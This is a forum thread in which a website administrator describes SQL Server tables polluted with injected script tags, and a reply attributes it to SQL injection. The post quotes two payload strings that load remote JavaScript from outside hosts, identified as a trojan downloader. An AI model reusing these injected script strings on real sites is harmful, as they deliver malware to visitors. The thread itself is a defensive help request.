virus script problem

Hello, i am a new member from Greece.

I am administrator of a website and recently i had two similar virus problems.

Suddenly before two weeks i found out that in many of the tables of my database (hosted in SQL server 2005) a great deal of records was filled in the end of many text fields with the string -- script src=http://www.lksr.ru/ngg.js>/script --

and after a week with string &"></title> script src="&chr(34)&"http://jjmaoduo.3322.org/csrss/w.js"&chr(34)&"> /script <!--.

That cause major problem when someone tried to see informations from database. Zonealarm was Quarantine the virus Trojan-Downloader.JS.Agent.ccv
I wrote some code to scan the database and to change the appearance of this string with an empty string and was cleaned.

I am trying to figure out how this happened and what to do to avoid it next time.
How anyone could have access to the database and added the strings in almost all the tables.

Thanks

re: virus script problem

Hi stefmpiz,

Websites that allow the user to directly query the database can be vulnerable to SQL Injection attacks. This is where the malicious user is able to enter sql directly into your database via your front end web page. Check out this article which explains how you can be vulnerable to SQL Injections in further detail.

There are some simple steps that you can take to protect yourself from most SQL Injections like checking all input strings for certain words and characters - there are some examples at the end of that article. If your website is out on the WWW then it is definitely worth protecting yourself as a matter of course.

I'm not saying that this is definitely what happened but it sounds pretty likely to me.

Hope this helps,

Dr B